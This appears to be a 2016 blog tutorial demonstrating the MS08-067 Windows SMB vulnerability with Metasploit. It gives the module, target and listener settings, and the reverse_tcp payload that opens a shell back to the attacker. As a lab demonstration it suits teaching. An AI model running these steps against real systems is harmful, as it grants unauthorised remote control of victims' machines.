Thursday, 19 May 2016

MS08_067 Vulnerability Demo with Metasploit

A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved. For this example, I will try to make reverse shell connection. The schema is represented by the image below:

To make this kind of schema, I will use the ms08_067_netapi vulnerability. Ms08 means Microsoft 2008, the year of the patch that make this vulnerability. 067 means the patch number of that year (67th). The vulnerability is explain here.

First, I set the exploit by using the command use windows/smb/ms08_067_netapi. Next I had to set the target host on RHOST. Just type set RHOST to set the target IP address.

Next, run show options to see the this that has been setup.The RHOST now point to and the RPORT pointed to an open port of the target.

The next step is to set the payload. Payload is the set  of codes that is used to execute the exploit. This time to make a reverse shell, the payload that need to be set is the windows/shell/reverse_tcp. In reverse shell, we need to set the listening host (LHOST) because the target needs to listen to this host. Set LHOST with the set LHOST To see the LHOST again execute show options.

This time, options command show the info of the LHOST. The LHOST will listen on port 4444. The last command is to run the exploit by typing exploit.

There you go, I have an access to the shell target.



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